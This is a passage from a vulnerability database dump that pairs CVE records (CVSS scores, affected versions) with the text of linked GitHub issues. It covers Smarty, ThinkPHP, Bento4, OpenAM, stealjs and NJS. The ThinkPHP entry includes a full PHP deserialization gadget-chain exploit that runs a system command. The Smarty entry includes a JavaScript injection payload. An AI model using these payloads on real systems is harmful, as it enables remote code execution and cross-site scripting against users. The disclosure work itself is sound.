"af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-09" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:smarty:smarty:*:*:*:*:*:*:*:*", "matchCriteriaId": "2C07B998-ABE8-4F99-8A25-EEEBBC27599E", "versionEndExcluding": "3.1.47", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:smarty:smarty:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4C5DBC8-BA50-48A6-965D-2BC0750735CE", "versionEndExcluding": "4.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/smarty-php/smarty/issues/454
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "smarty-php", "smarty" ]
I found a bug in the **Smarty package**, specifically in the **smarty_function_mailto($params)** function. Remote exploitation of such vulnerability is unlikely, but it is still advisable to take it into account. A web page that uses this function and that could be parameterized using GET or POST input parameters could cause the injection of JavaScript code of a malicious user and cause cross-site scripting attacks. Using the following code you can inject JavaScript code into the **smarty_function_mailto** function. =============================================================== $params = array( 'encode'=>'javascript', 'address'=>'iricartb@gmail.com">iricartb@gmail.com</a>\'); alert("- JavaScript Injected -"); //', ); echo smarty_function_mailto($params); =============================================================== ![smarty_mailto](https://user-images.githubusercontent.com/20545552/41548647-e00488e4-7323-11e8-83e7-09bdb4c843bf.jpg)
smarty_function_mailto - JavaScript injection in eval function
https://api.github.com/repos/smarty-php/smarty/issues/454/comments
3
2018-06-18T16:31:00Z
2022-12-27T11:00:26Z
https://github.com/smarty-php/smarty/issues/454
333,345,886
454
4,145
CVE-2022-38352
2022-09-15T02:15:09.223
ThinkPHP v6.0.13 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\Psr6Cache. This vulnerability allows attackers to execute arbitrary code via a crafted payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2749" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2749" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp:thinkphp:6.0.13:*:*:*:*:*:*:*", "matchCriteriaId": "DDD39D80-F4FD-4FDA-B294-E26CF148F865", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/top-think/framework/issues/2749
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "top-think", "framework" ]
Any method of any class, where eval is called to execute php code, thereby executing php and writing to a file. ```php <?php namespace League\Flysystem\Cached\Storage{ class Psr6Cache{ private $pool; protected $autosave = false; public function __construct($exp) { $this->pool = $exp; } } } namespace think\log{ class Channel{ protected $logger; protected $lazy = true; public function __construct($exp) { $this->logger = $exp; $this->lazy = false; } } } namespace think{ class Request{ protected $url; public function __construct() { $this->url = '<?php system(\'calc\'); exit(); ?>'; } } class App{ protected $instances = []; public function __construct() { $this->instances = ['think\Request'=>new Request()]; } } } namespace think\view\driver{ class Php{} } namespace think\log\driver{ class Socket{ protected $config = []; protected $app; protected $clientArg = []; public function __construct() { $this->config = [ 'debug'=>true, 'force_client_ids' => 1, 'allow_client_ids' => '', 'format_head' => [new \think\view\driver\Php,'display'], # 利用类和方法 ]; $this->app = new \think\App(); $this->clientArg = ['tabid'=>'1']; } } } namespace{ $c = new think\log\driver\Socket(); $b = new think\log\Channel($c); $a = new League\Flysystem\Cached\Storage\Psr6Cache($b); echo urlencode(serialize($a)); } ```
There is a new exploit chain for the deserialization vulnerability of thinkphp 6.0.13
https://api.github.com/repos/top-think/framework/issues/2749/comments
0
2022-08-14T15:26:02Z
2024-03-01T08:25:01Z
https://github.com/top-think/framework/issues/2749
1,338,277,889
2,749
4,146
CVE-2022-40737
2022-09-15T04:15:24.610
An issue was discovered in Bento4 through 1.6.0-639. A buffer over-read exists in the function AP4_StdcFileByteStream::WritePartial located in System/StdC/Ap4StdCFileByteStream.cpp, called from AP4_ByteStream::Write and AP4_HdlrAtom::WriteFields.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/756" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/756" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/axiomatic-systems/Bento4/issues/756
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, I use fuzzer to test bianry mp4split, and found some vulnerabilities,the following is the details. # Bug1 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000000,sig:06,src:000011,op:flip1,pos:31240,1216870 ================================================================= ==2589461==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000cfdb21 at pc 0x0000009a6c6c bp 0x7ffec6ff0d60 sp 0x7ffec6ff0510 READ of size 237 at 0x000000cfdb21 thread T0 #0 0x9a6c6b in __interceptor_fwrite.part.57 /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143 #1 0x7ab8fa in AP4_StdcFileByteStream::WritePartial(void const*, unsigned int, unsigned int&) (/mp4split/mp4split/mp4split+0x7ab8fa) #2 0x471cf7 in AP4_ByteStream::Write(void const*, unsigned int) (/mp4split/mp4split/mp4split+0x471cf7) #3 0x4d1be1 in AP4_HdlrAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4d1be1) #4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #5 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #7 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #10 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872) #11 0x7f7ce8910c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689) 0x000000cfdb21 is located 63 bytes to the left of global variable 'AP4_GlobalOptions::g_Entries' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4Utils.cpp:37:56' (0xcfdb60) of size 8 0x000000cfdb21 is located 0 bytes to the right of global variable 'AP4_String::EmptyString' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4String.cpp:39:18' (0xcfdb20) of size 1 'AP4_String::EmptyString' is ascii string '' SUMMARY: AddressSanitizer: global-buffer-overflow /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143 in __interceptor_fwrite.part.57 Shadow bytes around the buggy address: 0x000080197b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 0x000080197b30: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 f9 0x000080197b40: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 0x000080197b50: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 =>0x000080197b60: f9 f9 f9 f9[01]f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x000080197b70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00 0x000080197b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2589461==ABORTING ``` # Bug2 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000001,sig:06,src:000011,op:flip1,pos:31415,1226899 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2659777==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000096b50a bp 0x7ffda4354030 sp 0x7ffda4353e70 T0) ==2659777==The signal is caused by a READ memory access. ==2659777==Hint: address points to the zero page. #0 0x96b50a in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const (/mp4split/mp4split/mp4split+0x96b50a) #1 0x88e625 in AP4_EsDescriptor::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x88e625) #2 0x896a7f in AP4_Expandable::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x896a7f) #3 0x4bdbcd in AP4_EsdsAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4bdbcd) #4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #5 0x61dbf8 in AP4_SampleEntry::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x61dbf8) #6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #7 0x676f0b in AP4_StsdAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x676f0b) #8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #10 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #11 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #12 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #13 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #14 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #15 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #16 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #17 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #18 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872) #19 0x7f1636a2cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #20 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/mp4split/mp4split/mp4split+0x96b50a) in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==2659777==ABORTING ``` # poc [crash.zip](https://github.com/axiomatic-systems/Bento4/files/9565816/crash.zip) # environment Ubuntu 18.04(docker) # credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Thansk for your time!
there are some vulnerabilities in binary mp4split
https://api.github.com/repos/axiomatic-systems/Bento4/issues/756/comments
2
2022-09-14T11:20:27Z
2023-06-26T06:40:26Z
https://github.com/axiomatic-systems/Bento4/issues/756
1,372,814,057
756
4,147
CVE-2022-31735
2022-09-15T05:15:08.883
OpenAM Consortium Edition version 14.0.0 provided by OpenAM Consortium contains an open redirect vulnerability (CWE-601). When accessing an affected server through some specially crafted URL, the user may be redirected to an arbitrary website.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "vultures@jpcert.or.jp", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openam-jp/openam/issues/259" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/vu/JVNVU99326969/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openam-jp/openam/issues/259" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/vu/JVNVU99326969/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:osstech:openam:*:*:*:*:consortium:*:*:*", "matchCriteriaId": "1E5893F0-D7DF-46D8-A751-E965D6ADAC4A", "versionEndExcluding": null, "versionEndIncluding": "13.0.0-183", "versionStartExcluding": null, "versionStartIncluding": "13.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:osstech:openam:*:*:*:*:consortium:*:*:*", "matchCriteriaId": "893EC9F5-1FF1-41C2-9C41-B5B2697B15DE", "versionEndExcluding": null, "versionEndIncluding": "14.2.0-2", "versionStartExcluding": null, "versionStartIncluding": "14.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/openam-jp/openam/issues/259
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "openam-jp", "openam" ]
## Description OpenAM (OpenAM Consortium Edition) has an open redirect vulnerability in logout URL. After performing some steps, accessing the logout URL with a malformed parameter can redirect the user to an arbitrary URL.
Open Redirect Vulnerability
https://api.github.com/repos/openam-jp/openam/issues/259/comments
0
2022-09-13T01:23:52Z
2022-09-15T02:04:45Z
https://github.com/openam-jp/openam/issues/259
1,370,718,149
259
4,148
CVE-2022-37257
2022-09-15T13:15:09.653
Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the requestedVersion variable in npm-convert.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://steal.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://stealjs.com" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L371" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1526" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://steal.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://stealjs.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L371" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1526" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*", "matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/stealjs/steal/issues/1526
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the requestedVersion variable in npm-convert.js. The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
[CVE-2022-37257]/prototype-pollution found in npm-convert.js
https://api.github.com/repos/stealjs/steal/issues/1526/comments
0
2022-09-14T09:08:10Z
2022-09-14T09:08:10Z
https://github.com/stealjs/steal/issues/1526
1,372,628,760
1,526
4,149
CVE-2022-37266
2022-09-15T13:15:09.697
Prototype pollution vulnerability in function extend in babel.js in stealjs steal 2.2.4 via the key variable in babel.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29165" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29169" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1535" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29165" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29169" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1535" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*", "matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/stealjs/steal/issues/1535
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
Prototype pollution vulnerability in function extend in babel.js in stealjs steal 2.2.4 via the key variable in babel.js. The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
[CVE-2022-37266] Prototype pollution found in babel.js
https://api.github.com/repos/stealjs/steal/issues/1535/comments
0
2022-09-14T09:49:39Z
2022-09-14T09:49:39Z
https://github.com/stealjs/steal/issues/1535
1,372,688,015
1,535
4,150
CVE-2022-37262
2022-09-15T16:15:10.323
A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3497" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3507" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3497" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3507" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1531" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*", "matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/stealjs/steal/issues/1531
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js. The ReDoS vulnerability can be mitigated with several best practices described here: https://snyk.io/blog/redos-and-catastrophic-backtracking/
[CVE-2022-37262]/ReDos found in main.js
https://api.github.com/repos/stealjs/steal/issues/1531/comments
0
2022-09-14T09:33:46Z
2022-09-14T09:33:46Z
https://github.com/stealjs/steal/issues/1531
1,372,664,571
1,531
4,151
CVE-2022-37264
2022-09-15T16:15:10.387
Prototype pollution vulnerability in stealjs steal 2.2.4 via the optionName variable in main.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2194" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L647" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1533" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2194" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L647" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1533" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*", "matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/stealjs/steal/issues/1533
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
Prototype pollution vulnerability in stealjs steal 2.2.4 via the optionName variable in main.js. The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
[CVE-2022-37264]/ Prototype pollution found in main.js
https://api.github.com/repos/stealjs/steal/issues/1533/comments
0
2022-09-14T09:40:44Z
2022-09-14T09:40:44Z
https://github.com/stealjs/steal/issues/1533
1,372,674,742
1,533
4,152
CVE-2022-38890
2022-09-15T16:15:10.687
Nginx NJS v0.7.7 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h
